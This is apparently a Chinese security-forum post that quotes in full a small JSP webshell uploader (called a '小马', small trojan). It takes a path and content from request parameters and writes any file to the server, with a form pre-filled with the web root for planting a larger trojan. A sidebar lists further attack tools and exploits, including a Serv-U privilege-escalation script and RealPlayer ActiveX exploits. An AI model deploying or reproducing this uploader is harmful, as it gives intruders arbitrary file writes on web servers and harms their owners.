|
| 以下是引用片段: <%@ page language="java" pageEncoding="gbk"%> <jsp:directive.page import="java.io.File"/> <jsp:directive.page import="java.io.OutputStream"/> <jsp:directive.page import="java.io.FileOutputStream"/> <html> <head> <title>小马</title> <meta http-equiv="keywords" content="小马"> <meta http-equiv="description" content="小马"> </head> <% int i=0; String method=request.getParameter("act"); if(method!=null&&method.equals("up")){ String url=request.getParameter("url"); String text=request.getParameter("text"); File f=new File(url); if(f.exists()){ f.delete(); } try{ OutputStream o=new FileOutputStream(f); o.write(text.getBytes()); o.close(); }catch(Exception e){ i++; %> 上传不成功 <% } } if(i==0){ %> 上传成功 <% } %> <body> <form action=’?act=up’ method=’post’> <input size="100" value="<%=application.getRealPath("/") %>" name="url"><br> <textarea rows="20" cols="80" name="text">这写马的代码</textarea><br> <input type="submit" value="up" name="text"/> </form> </body> </html> |
| 强悍挂马工具:IIS_AD IIS扩展(附 | 05-04 |
| Real Player rmoc3260.dll Activ | 04-04 |
| Real Player rmoc3260.dll Activ | 04-03 |
| Pangolin号称很牛的注入工具 | 03-25 |
| 仿FirePack网马管理系统fsploit | 03-01 |
| 机器狗生成器 | 02-26 |
| Serv-U 6.X 提权脚本 | 01-31 |
| 入侵工具Knark的分析及防范 | 01-14 |
| 如何使用Nikto漏洞扫描工具检测网 | 12-21 |
| 十三WEBSHELL终结版后门的去除过 | 12-14 |
| hijack(红狼安全小组原创作品 - | 11-29 |
| 高级内网渗透工具:Paris (创建VP | 11-01 |